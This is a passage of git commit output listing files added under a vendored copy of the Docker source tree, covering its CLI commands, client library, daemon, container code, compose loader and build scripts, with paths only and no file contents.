 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/in.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/out.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/registry.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/update.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/trust.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/utils.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/inspect.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go
 create mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env
 create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env
 create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
 create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
 create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
 create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go
 create mode 100644 vendor/github.com/docker/docker/cli/error.go
 create mode 100644 vendor/github.com/docker/docker/cli/flags/client.go
 create mode 100644 vendor/github.com/docker/docker/cli/flags/common.go
 create mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go
 create mode 100644 vendor/github.com/docker/docker/cli/required.go
 create mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/config.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
 create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
 create mode 100644 vendor/github.com/docker/docker/client/README.md
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create.go
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete.go
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete_test.go
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list.go
 create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/client.go
 create mode 100644 vendor/github.com/docker/docker/client/client_mock_test.go
 create mode 100644 vendor/github.com/docker/docker/client/client_test.go
 create mode 100644 vendor/github.com/docker/docker/client/client_unix.go
 create mode 100644 vendor/github.com/docker/docker/client/client_windows.go
 create mode 100644 vendor/github.com/docker/docker/client/container_attach.go
 create mode 100644 vendor/github.com/docker/docker/client/container_commit.go
 create mode 100644 vendor/github.com/docker/docker/client/container_commit_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_copy.go
 create mode 100644 vendor/github.com/docker/docker/client/container_copy_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_create.go
 create mode 100644 vendor/github.com/docker/docker/client/container_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_diff.go
 create mode 100644 vendor/github.com/docker/docker/client/container_diff_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_exec.go
 create mode 100644 vendor/github.com/docker/docker/client/container_exec_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_export.go
 create mode 100644 vendor/github.com/docker/docker/client/container_export_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/container_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_kill.go
 create mode 100644 vendor/github.com/docker/docker/client/container_kill_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_list.go
 create mode 100644 vendor/github.com/docker/docker/client/container_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_logs.go
 create mode 100644 vendor/github.com/docker/docker/client/container_logs_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_pause.go
 create mode 100644 vendor/github.com/docker/docker/client/container_pause_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_prune.go
 create mode 100644 vendor/github.com/docker/docker/client/container_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/container_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_rename.go
 create mode 100644 vendor/github.com/docker/docker/client/container_rename_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_resize.go
 create mode 100644 vendor/github.com/docker/docker/client/container_resize_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_restart.go
 create mode 100644 vendor/github.com/docker/docker/client/container_restart_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_start.go
 create mode 100644 vendor/github.com/docker/docker/client/container_start_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_stats.go
 create mode 100644 vendor/github.com/docker/docker/client/container_stats_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_stop.go
 create mode 100644 vendor/github.com/docker/docker/client/container_stop_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_top.go
 create mode 100644 vendor/github.com/docker/docker/client/container_top_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_unpause.go
 create mode 100644 vendor/github.com/docker/docker/client/container_unpause_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_update.go
 create mode 100644 vendor/github.com/docker/docker/client/container_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/container_wait.go
 create mode 100644 vendor/github.com/docker/docker/client/container_wait_test.go
 create mode 100644 vendor/github.com/docker/docker/client/disk_usage.go
 create mode 100644 vendor/github.com/docker/docker/client/errors.go
 create mode 100644 vendor/github.com/docker/docker/client/events.go
 create mode 100644 vendor/github.com/docker/docker/client/events_test.go
 create mode 100644 vendor/github.com/docker/docker/client/hijack.go
 create mode 100644 vendor/github.com/docker/docker/client/image_build.go
 create mode 100644 vendor/github.com/docker/docker/client/image_build_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_create.go
 create mode 100644 vendor/github.com/docker/docker/client/image_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_history.go
 create mode 100644 vendor/github.com/docker/docker/client/image_history_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_import.go
 create mode 100644 vendor/github.com/docker/docker/client/image_import_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/image_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_list.go
 create mode 100644 vendor/github.com/docker/docker/client/image_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_load.go
 create mode 100644 vendor/github.com/docker/docker/client/image_load_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_prune.go
 create mode 100644 vendor/github.com/docker/docker/client/image_pull.go
 create mode 100644 vendor/github.com/docker/docker/client/image_pull_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_push.go
 create mode 100644 vendor/github.com/docker/docker/client/image_push_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/image_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_save.go
 create mode 100644 vendor/github.com/docker/docker/client/image_save_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_search.go
 create mode 100644 vendor/github.com/docker/docker/client/image_search_test.go
 create mode 100644 vendor/github.com/docker/docker/client/image_tag.go
 create mode 100644 vendor/github.com/docker/docker/client/image_tag_test.go
 create mode 100644 vendor/github.com/docker/docker/client/info.go
 create mode 100644 vendor/github.com/docker/docker/client/info_test.go
 create mode 100644 vendor/github.com/docker/docker/client/interface.go
 create mode 100644 vendor/github.com/docker/docker/client/interface_experimental.go
 create mode 100644 vendor/github.com/docker/docker/client/interface_stable.go
 create mode 100644 vendor/github.com/docker/docker/client/login.go
 create mode 100644 vendor/github.com/docker/docker/client/network_connect.go
 create mode 100644 vendor/github.com/docker/docker/client/network_connect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_create.go
 create mode 100644 vendor/github.com/docker/docker/client/network_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_disconnect.go
 create mode 100644 vendor/github.com/docker/docker/client/network_disconnect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/network_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_list.go
 create mode 100644 vendor/github.com/docker/docker/client/network_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/network_prune.go
 create mode 100644 vendor/github.com/docker/docker/client/network_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/network_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/node_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/node_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/node_list.go
 create mode 100644 vendor/github.com/docker/docker/client/node_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/node_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/node_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/node_update.go
 create mode 100644 vendor/github.com/docker/docker/client/node_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/ping.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_create.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_disable.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_disable_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_enable.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_enable_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_install.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_list.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_push.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_push_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_set.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_set_test.go
 create mode 100644 vendor/github.com/docker/docker/client/plugin_upgrade.go
 create mode 100644 vendor/github.com/docker/docker/client/request.go
 create mode 100644 vendor/github.com/docker/docker/client/request_test.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_create.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_list.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_update.go
 create mode 100644 vendor/github.com/docker/docker/client/secret_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_create.go
 create mode 100644 vendor/github.com/docker/docker/client/service_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/service_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_list.go
 create mode 100644 vendor/github.com/docker/docker/client/service_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_logs.go
 create mode 100644 vendor/github.com/docker/docker/client/service_logs_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/service_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/client/service_update.go
 create mode 100644 vendor/github.com/docker/docker/client/service_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_init.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_init_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_join.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_join_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_leave.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_leave_test.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_update.go
 create mode 100644 vendor/github.com/docker/docker/client/swarm_update_test.go
 create mode 100644 vendor/github.com/docker/docker/client/task_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/task_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/task_list.go
 create mode 100644 vendor/github.com/docker/docker/client/task_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/testdata/ca.pem
 create mode 100644 vendor/github.com/docker/docker/client/testdata/cert.pem
 create mode 100644 vendor/github.com/docker/docker/client/testdata/key.pem
 create mode 100644 vendor/github.com/docker/docker/client/transport.go
 create mode 100644 vendor/github.com/docker/docker/client/utils.go
 create mode 100644 vendor/github.com/docker/docker/client/version.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_create.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_create_test.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_inspect.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_list.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_list_test.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_prune.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_remove.go
 create mode 100644 vendor/github.com/docker/docker/client/volume_remove_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/README.md
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/metrics.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
 create mode 100644 vendor/github.com/docker/docker/container/archive.go
 create mode 100644 vendor/github.com/docker/docker/container/container.go
 create mode 100644 vendor/github.com/docker/docker/container/container_linux.go
 create mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go
 create mode 100644 vendor/github.com/docker/docker/container/container_unit_test.go
 create mode 100644 vendor/github.com/docker/docker/container/container_unix.go
 create mode 100644 vendor/github.com/docker/docker/container/container_windows.go
 create mode 100644 vendor/github.com/docker/docker/container/health.go
 create mode 100644 vendor/github.com/docker/docker/container/history.go
 create mode 100644 vendor/github.com/docker/docker/container/memory_store.go
 create mode 100644 vendor/github.com/docker/docker/container/memory_store_test.go
 create mode 100644 vendor/github.com/docker/docker/container/monitor.go
 create mode 100644 vendor/github.com/docker/docker/container/mounts_unix.go
 create mode 100644 vendor/github.com/docker/docker/container/mounts_windows.go
 create mode 100644 vendor/github.com/docker/docker/container/state.go
 create mode 100644 vendor/github.com/docker/docker/container/state_solaris.go
 create mode 100644 vendor/github.com/docker/docker/container/state_test.go
 create mode 100644 vendor/github.com/docker/docker/container/state_unix.go
 create mode 100644 vendor/github.com/docker/docker/container/state_windows.go
 create mode 100644 vendor/github.com/docker/docker/container/store.go
 create mode 100644 vendor/github.com/docker/docker/container/stream/streams.go
 create mode 100644 vendor/github.com/docker/docker/contrib/README.md
 create mode 100644 vendor/github.com/docker/docker/contrib/REVIEWERS
 create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/main.go
 create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/template.go
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
 create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
